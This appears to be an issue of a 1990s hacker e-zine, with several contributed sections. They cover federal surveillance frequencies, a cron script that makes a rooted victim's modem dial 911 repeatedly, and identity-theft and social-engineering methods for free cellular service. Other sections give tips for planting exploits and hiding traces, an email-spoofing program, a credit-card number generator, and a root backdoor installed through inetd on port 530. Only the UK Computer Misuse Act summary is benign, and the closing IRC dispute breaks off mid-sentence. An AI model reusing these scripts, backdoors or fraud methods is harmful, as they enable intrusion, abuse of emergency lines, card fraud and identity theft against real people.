Commonly Used by Federal Agencies for Bugs, Wireless Microphones,
and Body Wires (also 138-220 mhz, and 399-420 mhz, under 25-50 mw).
149.3500, 165.9125, 167.3375, 167.3425, 167.4875, 168.0115,
169.2000, 169.4450, 169.5050, 170.2450, 170.3050, 171.0450,
171.1050, 171.4500, 171.6000, 171.7500, 171.8450, 171.8500,
171.9050, 172.0000, 172.2000, 172.2125, 172.2375, 172.2625,
172.2875, 172.3125, 172.3375, 172.3625, 172.3875, 172.5500
173.3375
169.445, 169.505, 170.245, 170.305, 171.045, 171.105, 171.845, 171.905
27.5750 Customs Low Power < 5 watts
27.5850 Customs Low Power < 5 watts
163.1000 Customs Low Power < 30 watts
418.5750 Customs Low Power < 30 watts
40.1200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
40.1700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
40.2200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
40.2700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
164.9125 FBI Surveillance
165.9125 ATF F5 Surveillance
166.2875 ATF
170.4125 ATF
407.8000 Secret Service
406.2750 Secret Service
408.5000 Secret Service
408.9750 Secret Service
172.2000 DOJ/DEA CH.1
171.6000 DOJ/DEA CH.2
418.0500 DEA Low Power
418.0750 DEA Low Power
418.5750 DEA Low Power
418.7500 DEA
418.6750 DEA
418.9000 DEA F2 CINDY (416.325) Surveillance
418.7500 DEA F3 GAIL Surveillance/Strike Force
418.6750 DEA F4 EMILY (416.325) Surveillance
407.8000 CIA, State Department
408.0500 Federal Shared
408.5750 Federal Shared
409.4000 Federal Shared
960-1215mhz Spread Spectrum Systems (Wideband)
Generally Recognized Federal Bug/Spy Bands
Primary - 25-50mhz, 135-175mhz, 225-440mhz, 1710-1950mhz, 8.3-12.5ghz
Secondary - 890mhz-5.50ghz, 7.0-9.5ghz, 10-39.6ghz
Also, Wide Band Frequency Hopping centered on various UHF-TV channels
(ie: 510 or 670 mhz with a hopping width of +/- 25 mhz)
Keep in mind that the federal government can use virtually any
frequency between DC and light. So get scanning now!!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. 911 Autodialler Script : dk
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, scenario...
Your Friend g1mpfuck is on his linux system, you have never really liked him,
and he has gone out to someplave for a few hours, to be back this evening...
If you root his system, and run this, his modem will dial 911 every 10 mins,
but as soon as you do run it, it will kill the pppd and dial the number, so if
he's on IRC, then he will quit... Here it is! Read the instructions in the
code first...
#!/bin/sh
# 911-autodial.sh
#
# for use with linux boxes running DIP.
# dials 911 every ten minutes, and if the user is using pppd
# it kills pppd in order to place the call.
# IMPORTANT!!!
# add this line to root's crontab with: crontab -e root
# 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh
# note: this assumes the modem device is: /dev/modem
# if it is otherwise change "port modem" to
# "port cua1" or whatever the modem device is
# although it is usally /dev/modem.
echo " get $local 0.0.0.0" >> /tmp/911.dip
echo " get $remote 0.0.0.0" >> /tmp/911.dip
echo " port modem" >> /tmp/911.dip
echo " speed 38400" >> /tmp/911.dip
echo " reset" >> /tmp/911.dip
echo " send ATQ0V1E1X4\r" >> /tmp/911.dip
echo " wait OK 2" >> /tmp/911.dip
echo " dial 911" >> /tmp/911.dip
ps -aux|grep pppd|grep -v grep >> /tmp/ppp-check
grep "^root" /tmp/ppp-check > /dev/null 2>&1
if [ $? -ne 0 ] ; then
echo "PPP IS DEAD" > /tmp/ppp-dead
fi
if [ -f /tmp/ppp-dead ]; then
/sbin/dip /tmp/911
rm /tmp/ppp-*
rm /tmp/911.dip
exit 1
fi
kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}`
/sbin/dip /tmp/911
rm /tmp/ppp-*
rm /tmp/911.dip
exit 1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Cellular Calls Without Cloning : TRON
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
There are several ways to make free calls with a cellular phone that does not
have service with the hassle of cloning it, or if you have a phone that can't
be cloned or you don't want to buy the expensive equipment required, so here
are a few ways to do it from home with little risk...
1.) American Roaming Network.
-----------------------------
To reach the American Roaming Network (or something like it, depending on
where you are), put your phone on the alternate carrier side so it says roam,
then dial 0 and it should tell you your call is being forwarded.
At that point you should be connected to an automated system, form here you
have a couple of billing options...
To use a credit or calling card, you enter the area code and number you want
to call; for a calling card you then enter the card number and pin, for a
credit card you then enter the card number and expirarion date, then the zip
code of the billing address. ARN takes MasterCard, American Express, and
most local and long distance company calling cards. They say they dont take
VISA anymore, but I've gotten them to work on the automated system.
If the number you call is busy or doesn't answer, you can press * and then
either leave a message that the system will deliver, or try another number.
If you want to dial another number you will have to put the zip code again
after the new number.
You can also make collect and 3rd party billed calls by dialing 0 instead of
the number to call when you connect to ARN. You will be sent to an operator,
tell them you would like to place a call. They will then ask how you would
like to bill it. You can set up a local dialup voice mail box and change
the greeting so it sounds like someone's there to accept the charges, the
operator has to read a script, so you have to adjust the timing to get it
just right.
ARN will not 3rd party or collect bill to 800 numbers, nor will they place
calls to 800 numbers charged to 3rd party numbers.
2.) Social Engineering.
-----------------------
Another way is to dial 611 and tell the customer support person that you're
having trouble getting through to the area you're trying yo call and could
they try place the call for you. This works about 50% of the time, it helps
to have the name and cell number of someone who has service with that
provider in case they ask for it, they might ask for the social security
number too, so be prepared, dumpster diving at a cell store is the easiest
place to get that info.
3.) Set Up Service With Someone Else's Info.
--------------------------------------------
The best way, and the one I prefer to cloning, is to get someone else's
information and set up service. The best place to get the information you'll
need is from a place that does credit checks, like a bank or car dealership.
Make sure they have a good rating, like A, B or C, then you wont be asked
for a deposit.
You'll need a name, address, social security number, drivers license number
and work number.
You will also need a cell phone that is not stolen. They will not activate a
stolen phone, when I tried they put me on hold and called the person who's
phone I had and then told me the person wanted me to mail the phone back to
them.
Also find and write down the electronic serial number, you'll need that too.
You then need to call a local cell service provider (ie. GTE MobilNet,
Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell
you about the different service plans and pick one.
They will then ask for your "information" and ESN. Then they will ask to
call you back with your new cell number, tell them that you're out and
ask for a number to call them back at, they will have no problem with this.
Then call them back and they will tell you how to program your new number
into your phone, they might also tell you how to program in a new system ID
and pagin channel etc, this is no big deal.
Also ask when the billing cycle ends and when the bill is sent out, you will
want to stop using this number when the person you're billing it to gets
their bill.
Be sure to get call features like 3-way and call forwarding, they're always
useful to have.
I prefer this to cloning because its less worry and hassle and it lasts up
to a month.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Getting Your Exploits Onto Systems : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
You want to get files or exploits onto another system, you can do this the
following few ways...
1) Mail The User The File.
--------------------------
This method is simple, easy to do, pretty undetectable, but sometimes may be
a touch too slow, depending on the location / speed of the system...just mail
login@host.com the file or whatever, then wait at the other side for them to
get it.
2) FTP to the system.
----------------------
Using an FTP client, you can FTP to the remote server from your system, then
upload the files to the server, but you will most probably get logged, and so
if your exploits fail, this may not be such a good idea...
3) Use cat to input the file from the terminal.
-----------------------------------------------
This is easy to do, pretty quick and effective, follow these steps...
FearFactory:~:$ cat > heh.c << STOP
#include <stdio.h>
main()
{
printf("Quit Laughin' At Yerself Yew Gimp :P\n"):
}
STOP
FearFactory:~:$ cat heh.c
#include <stdio.h>
main()
{
printf("Quit Laughin' At Yerself Yew Gimp :P\n"):
}
FearFactory:~:$ cc -o heh heh.c
FearFactory:~:$ heh
Quit Laughin' At Yerself Yew Gimp :P
FearFactory:~:$
I used "cat > filename.c << STOP" to input the file from the terminal, I could
have cut a file from another editor, then just pasted it to the terminal, then
when I type "STOP" and hit enter, cat stops taking input from the terminal and
EOF's the file...Then I cat it again, to prove that the STOP does not stay as
part of the file, then I proceed to compile the source using cc and then I run
the program, easy =)
Always remember to remove traces of exploits from the system if you fail, as
this is messy and could lead to the admin becoming suspicious, just keep your
technique clean, and you will learn some good skills...
Recommended Reading :
---------------------
LINUX IN A NUTSHELL - A Desktop Quick Reference
By Jessica Perry Hekman
Copyright 1997 O'Reilly & Associates
ISBN 1-56592-167-4
UK : 14.99
US : $19.95
CAN : $28.95
I really like this book, its very easy to use, pretty compact, and 424 pages
long, the information in it will boost your skills by a long way if you are
a newbie, and there are alot of more advanced features, such as debugfs and
many other programs and their syntax. Basically its a dictionary of Linux
commands, along with a short explanation, the syntax for the command and
many examples, I have the first printing, which is January 1997, so this book
is not old at all, and pretty up-to-date...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Fakemailing Techniques : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Fakemailing is old and very very easy to do. To use this simple fakemailing
program just make a file, such as letter.txt with the stuff you want to send
in it, like "Hey Bill! how's it going?" or whatever. Next compile the
fakemail.c using gcc -o sendfake sendfake.c ignore any warning messages.
Run the program using "sendfake" and follow the steps, simple as that =)
/**********************************************************/
/* SENDFAKE.C */
/* */
/* */
/* Author: asm@quantum.syspac.com */
/* */
/* To compile: gcc -o sendfake sendfake.c */
/* Usage : sendfake */
/* */
/**********************************************************/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define MAXLEN 256
int s;
int call_socket(char *hostname)
{
struct sockaddr_in sa;
struct hostent *hp;
int a, s;
if ((hp=gethostbyname(hostname))==NULL) return(-1);
bzero(&sa, sizeof(sa));
bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length);
sa.sin_family = hp->h_addrtype;
sa.sin_port = htons((u_short)25);
if((s=socket(hp->h_addrtype, SOCK_STREAM, 0)) < 0)
return(-1);
if(connect(s, &sa, sizeof(sa)) < 0) {
close(s);
return(-1);
}
return(s);
}
int readln(char *buf)
{
int to=0;
char c;
do {
if(read(s, &c, 1)<1)
return(0);
if((c >= ' ') || (c <= 126))
if(to<MAXLEN-1)
buf[to++] = c;
} while (c != '\n');
buf[to] = '\0';
return(1);
}
void writeln(char *buf)
{
write(s, buf, strlen(buf));
write(s, "\n",1);
}
void input(char *msg,char *pt)
{
printf("%s: ",msg);
gets(pt);
}
int main(void)
{
char hostn[20];
char from[40];
char to[40];
char name[40];
char subject[60];
char passw[20];
char str[MAXLEN];
char buf[MAXLEN];
FILE *fp;
printf("\n");
printf("Welcome to sendfake! The BEST fake/anon mailer there is!\n");
printf("By asm@quantum.syspac.com\n");
printf("\n");
input("Host to fake mail from",hostn);
if((s=call_socket(hostn)) <0) {
perror("Connection error");
exit(1);
}
readln(buf);
gethostname(hostn,20);
sprintf(str, "HELO %s", hostn);
writeln(str);
readln(buf);
input("Fake email address fakemail is FROM",from);
sprintf(str, "MAIL FROM: <%s>",from);
writeln(str);
readln(buf);
do {
input("Send fake mail TO",to);
sprintf(str, "RCPT TO: <%s>",to);
writeln(str);
readln(buf);
*(buf+3) = 0;
if(atoi(buf) == 250) break; else printf("%s",buf+4);
} while(1);
input("Name of lamer getting the fake mail",name);
input("Subject of fake mail",subject);
writeln("DATA");
sprintf(str,"To: %s <%s>",name,to);
writeln(str);
if(strlen(subject)) {
sprintf(str, "Subject: %s", subject);
writeln(str);
}
do {
input("File to read and include in fake mail",str);
if(!strlen(str)) {
close(s);
exit(1);
}
if((fp = fopen(str,"rt")) == NULL) printf("Could not find file %s\n",
str);
else break;
} while(1);
while(fgets(str,MAXLEN,fp)) write(s, str, strlen(str));
writeln("\n.\n");
readln(buf);
writeln("QUIT\n");
printf("Sent!!!\n");
close(s);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Pascal Credit Card Generator Source : Lobster Guacamole
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PROGRAM ccnum;
{ Written by Lobster Guacamole. }
{ }
{ I wrote this program because I enjoy fucking over every goddam bureacratic }
{ and/or facist aspect of our society. This program simply spits out ten }
{ random credit card numbers based on the bank prefix used. See lines 58 }
{ through 61 for information on the bank prefix used. There is also a lame }
{ password feature for minor security. See lines 42 through 50 for }
{ information on the password feature. }
{ }
{ Remember, however, the numbers that are spit out may not work because }
{ the credit card company may not have assigned that number to a customer }
{ yet. Have fun! }
{ }
{ You can use a simple program like pas2c to translate this code into c }
{ - Tetsu Khan }
USES
Crt;
VAR
ccnum_count : Integer;
PROCEDURE program_init;
BEGIN
Randomize;
CheckBreak := False;
END;
PROCEDURE show_title;
BEGIN
ClrScr;
Writeln;
Writeln( 'CCNUM - Credit Card Number Generator.' );
Writeln( 'Written by Lobster Guacamole.' );
Writeln;
END;
PROCEDURE get_pwd;
VAR
program_pwd : String;
BEGIN
Writeln;
Write( 'Enter password>' );
Readln( program_pwd );
IF program_pwd = 'a' THEN { The current password is a lower case }
BEGIN { letter 'a'. Recompile the program if }
Writeln; { you change the password, of course. }
Writeln( 'Correct' ); { Change password on line 47 as well. }
Writeln;
END;
IF program_pwd <> 'a' THEN { If you changed the password on line 40, }
BEGIN { change it here, too. }
Writeln;
Writeln( 'Incorrect' );
Halt;
END;
END;
PROCEDURE make_ccnum;
VAR
ccnum_digits : ARRAY[ 1..16 ] OF Integer;
doub_odd_digits : ARRAY[ 1..8 ] OF Integer;
digit_count : Integer;
yn_choice : Char;
added_digits : Integer;
BEGIN
ccnum_digits[1] := 5; { This part may have to be changed depending }
ccnum_digits[2] := 4; { on the bank prefix used. The bank prefix }
ccnum_digits[3] := 2; { here is '5424', the prefix for Citibank. }
ccnum_digits[4] := 4; { Recompile the program if you change it. }
REPEAT
FOR digit_count := 5 TO 16 DO
BEGIN
ccnum_digits[ digit_count ] := Random(10);
END;
doub_odd_digits[1] := 2 * ccnum_digits[1];
IF doub_odd_digits[1] > 9 THEN
doub_odd_digits[1] := doub_odd_digits[1] - 9;
doub_odd_digits[2] := 2 * ccnum_digits[3];
IF doub_odd_digits[2] > 9 THEN
doub_odd_digits[2] := doub_odd_digits[2] - 9;
doub_odd_digits[3] := 2 * ccnum_digits[5];
IF doub_odd_digits[3] > 9 THEN
doub_odd_digits[3] := doub_odd_digits[3] - 9;
doub_odd_digits[4] := 2 * ccnum_digits[7];
IF doub_odd_digits[4] > 9 THEN
doub_odd_digits[4] := doub_odd_digits[4] - 9;
doub_odd_digits[5] := 2 * ccnum_digits[9];
IF doub_odd_digits[5] > 9 THEN
doub_odd_digits[5] := doub_odd_digits[5] - 9;
doub_odd_digits[6] := 2 * ccnum_digits[11];
IF doub_odd_digits[6] > 9 THEN
doub_odd_digits[6] := doub_odd_digits[6] - 9;
doub_odd_digits[7] := 2 * ccnum_digits[13];
IF doub_odd_digits[7] > 9 THEN
doub_odd_digits[7] := doub_odd_digits[7] - 9;
doub_odd_digits[8] := 2 * ccnum_digits[15];
IF doub_odd_digits[8] > 9 THEN
doub_odd_digits[8] := doub_odd_digits[8] - 9;
added_digits := doub_odd_digits[1] + doub_odd_digits[2] +
doub_odd_digits[3] + doub_odd_digits[4] +
doub_odd_digits[5] + doub_odd_digits[6] +
doub_odd_digits[7] + doub_odd_digits[8] +
ccnum_digits[2] + ccnum_digits[4] +
ccnum_digits[6] + ccnum_digits[8] +
ccnum_digits[10] + ccnum_digits[12] +
ccnum_digits[14] + ccnum_digits[16];
UNTIL added_digits MOD 10 = 0;
Writeln( ' ', ccnum_digits[1],
ccnum_digits[2],
ccnum_digits[3],
ccnum_digits[4],
' ',
ccnum_digits[5],
ccnum_digits[6],
ccnum_digits[7],
ccnum_digits[8],
' ',
ccnum_digits[9],
ccnum_digits[10],
ccnum_digits[11],
ccnum_digits[12],
' ',
ccnum_digits[13],
ccnum_digits[14],
ccnum_digits[15],
ccnum_digits[16] );
END;
BEGIN
program_init;
show_title;
get_pwd;
FOR ccnum_count := 1 TO 10 DO make_ccnum;
END.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. in.courierd : backdoor on port 530 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
As root do the following (without the %'s ;]) to setup the backdoor.
--------------------------------------------------------------------
[This Method Has Been Tested On A Linux 2.0.30]
% cp /bin/bash /usr/sbin/in.courierd
% chmod 4755 /usr/sbin/in.courierd [optional, depends on system]
% echo "courier stream tcp nowait root /usr/sbin/in.courierd" >> /etc/inetd.conf
% /sbin/pidof inetd.conf [to find the pid of inetd.conf]
% kill -HUP <pid> [replace the <pid> with the real pid]
% telnet localhost 530 [test backdoor]
All commands to the backdoor must end with ;, for example....
exit;
ps -a;
whoami;
cd /;
You are root when you use the backdoor, and you are not seen or logged. The
last time I used this, it stayed up for 2 weeks =)
The above commands I have tested in Linux, I have heard that you have to reboot
a Sun for the new settings to take effect (shutdown -r now).
But hey! its only a prototype at the moment until I make it cool and alot
better =)
Have fun.
so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. UK Laws On Computer Misuse : Darkfool
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This part is actually useful info, not like Darkfools lesser works...Partially
edited by me, the original can be now found at www.sinnerz.com/bible.htm - T_K
Hey, this is an interesting little read. Please note it still can be quite
interesting even if you don't like in UK - Darkfool.
The 1990 Computer Misuse Act - UK
---------------------------------
In plain English.
-----------------
"An Act to make provision for securing computer material against
unauthorised access or modification; and for connected purposes"
{ This is the long title (header) of the Act and confirms what the act does
and applies to. }
SECTION 1 Unauthorised access to computer material
--------------------------------------------------
TEXT:
A person is guilty of an offence if he causes a computer to perform any
function with intent to secure access to any program or data held in any
computer.
{ This means that if you can get access to files which you shouldn't be
allowed to retrieve or read then you are committing a offence, this only
applies if the person in question has intent ( meaning they are doing it
on purpose, often referred to as hacking ) to carry this out. }
A person is guilty of an Offence if the access he intends to secure is
unauthorised; and he knows at the time when he causes the computer to
perform the function that that is the case.
{ This means that the person is guilty doesn't have authorisation to
secure access to files then he is committing an offence. The person is
not guilty if he/she doesn't know what they are trying to perform.
This applies to everything i.e. any program, a program or data of any
particular kind and a program or data held }
A person guilty of an offence under this section shall be
liable on summary conviction to imprisonment for a term not exceeding
six months or to a fine not exceeding level 5 on the standard scale or
to both.
{ Meaning, you could go to prison for 6 months for committing
an offence mentioned above ! You could also be subject to a fine
@ level 5, which is always changing. You have to be convicted of the
crime first though ;) }
SECTION 2 Unauthorised access with intent to commit or facilitate
-----------------------------------------------------------------
commission of further offences
------------------------------
A person is guilty of an offence under this section if he commits an
offence under section 1 above. To commit an offence to which this
section applies or to facilitate the commission of such an offence
( whether by himself or by any other person) and the offence he intends
to commit or facilitate is referred to below in this section as the
further offence.
{ This meaning that what is mentioned in section 2
applies to the person gaining unauthorised access to a computer system
and to anyone who facilitates such a person }
This section applies to offences for which a person of twenty-one years
of age or over ( not previously convicted ) may be sentenced to
imprisonment for a term of five years.
{ This means that if you re-offend or facilitate to re-offend and have
been convicted you are liable to 5 years imprisonment or/and a large
fine }
SECTION 3 Unauthorised modification of computer material
--------------------------------------------------------
A person is guilty of an offence if he/she does any act that causes an
unauthorised modification of the contents of any computer; and at the
time when he does the act he has the requisite intent and the requisite
knowledge.
{ This means that if a person modifies computer material
which he/she is not authorised to do he/she is guilty of committing
an offence, however, the person must have the intent to carry out this
crime else the person is not liable }
{ This next bit is the interesting bit }
For the purposes of the above section the requisite knowledge is an intent
to cause a modification of the contents of any computer and by so doing
to impair the operation of any computer; to prevent or hinder access to
any program or data held in any computer; to impair the operation of any
such program or the reliability of any such data. The intent need not be
directed at any particular computer; any particular program or data or a
program or data of any particular kind; or any particular modification.
{ This basically means, if you have the intent and knowledge of breaking
into computers, without have to actually do it you can be liable to an
offence. }
For the purposes of the Criminal Damage Act 1971 a modification of the
contents of a computer shall not be regarded as damaging any computer or
computer storage medium unless its effect on that computer storage medium,
impairs its physical condition.
{ Meaning that you cannot be prosecuted for criminal damage whilst hacking
into a machine unless you cause physical damage i.e. on site hacking,
then taking a sledge hammer to the computer can be classed as criminal
damage but change the password for root login is not criminal damage,
unless you send the computer into high speed self destruct mode and
ruin one of the heads on the 50 gig duke box ? }
{ A lot of the next part of the document is about jurisdiction and some
technical mumbo jumbo }
SECTION 14 Search warrants for offences under section 1
-------------------------------------------------------
Where a circuit judge is satisfied by information on oath given by a
constable that there are reasonable grounds for believing that an offence
under section 1 above has been or is about to be committed in any
premises; and that evidence that such an offence has been or is about to
be committed is in those premises he/she may issue a warrant authorising a
constable to enter and search the premises, using such reasonable force
as is necessary.
{ This basically means that if they believe that you have the intent or
have broken into a system your not supposed to ( section 1 ) they can
come around your house and knock your door in, or, open it for them
nicely. }
SECTION 15 Extradition where Schedule 1 to the Extradition Act 1989 applies
---------------------------------------------------------------------------
The offences to which an order in council under section 2 of the extradition
act 1870 can apply shall include offences under sections 2 and 3 and any
conspiracy to commit such an offence and any attempt to commit an offence
under section 3.
{ This meaning, that if you have a conspiracy to break into a system you
can be extradited }
In the UK it can be illegal to posses anything which may show an intent to
hack, such as hacking documents.
So, if your out there and in UK and didn't know that you were doing is most
probably illegal then keep your head down !
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. so1o Gets Busted By CERT : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken
pussy! and a cl000less one at that!@# Speadin' shit about stuff you dont know :
[20:57] <FuckingHostile> dude!!
<byteboy> wassup?
[20:59] <FuckingHostile> so1o got busted by CERT!
<byteboy> lol
[21:00] <FuckingHostile> yup
[21:00] <FuckingHostile> they have logs of him on over 80 computers
[21:01] <FuckingHostile> thats all i know is like what i just got
forwarded to me
[21:03] <FuckingHostile> they got logs from when he used phfscan.c
[21:03] <FuckingHostile> and other shit
any more info on so1o shit ?
[21:06] <FuckingHostile> l
[21:06] <FuckingHostile> Dear Sir.
[21:06] <FuckingHostile> We have now traced down the responsible account
behind this attempt and=20
[21:06] <FuckingHostile> have taken action against it.
[21:06] <FuckingHostile> If you would like to know who is behond this you
should either file a=20
[21:06] <FuckingHostile> report to the propper authoroties or fax pege
Gustagsson at +++ 46 8=20
[21:06] <FuckingHostile> 7132657 and ask him to trace this down in the
phone network.
[21:06] <FuckingHostile> If you got any more question feel free to get
back to me.. or if you=20
[21:06] <FuckingHostile> think that this is to be considered as closed.
[21:06] <FuckingHostile> check this now
[21:06] <FuckingHostile> __ ____ Telia Internet=20
[21:06] <FuckingHostile> / /_/ / Incident Response Team
[21:06] <FuckingHostile> / / \ / IRT@TELIA.NET
[21:06] <FuckingHostile> =09 FAX ++46 - 8 456 8935=20
[21:06] <FuckingHostile> On Fri, 2 May 1997, m0dify wrote:
[21:06] <FuckingHostile> > That is the log from our www.usda.gov web
server.... CERT also said that
[21:06] <FuckingHostile> > this log
is on 80 computers since 4/1/97 .
There was also a log on
[21:06] <FuckingHostile> > the 17th of April. =20
[21:07] <FuckingHostile> > > Dear Sir.
[21:08] <FuckingHostile> > > This messages dropped down on my desk today.
[21:08] <FuckingHostile> > > I need a time to know who was on that dial up
and so whe could hunt
[21:08] <FuckingHostile> > > him/her down in the phone network..
[21:08] <FuckingHostile> heh... so1o fuct up it seems..
<byteboy> he's toast.
[21:10] <FuckingHostile> im glad to man... amnesty was just so uncool when
he did that
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
I've seen one of those logs that Modify had (now CERT have them too) and,
I'm sooooo dissapointed to say...
-I- -D-I-D-N-'-T -P-H-F- -T-H-O-S-E- S-I-T-E-S-
Let us look at the facts...Those that Hostile and his little lameassfuck sIn
wannabe haqr posse didn't even see :
-------------------------------------------------------------------------------
THE FACTS :
-------------------------------------------------------------------------------
CERT logs show that the phf queries to approximatley 80
sites on the same day that the www.amnesty.org page was
changed show that this technique was used..which is
fundementally incorrect, here is the phf query string
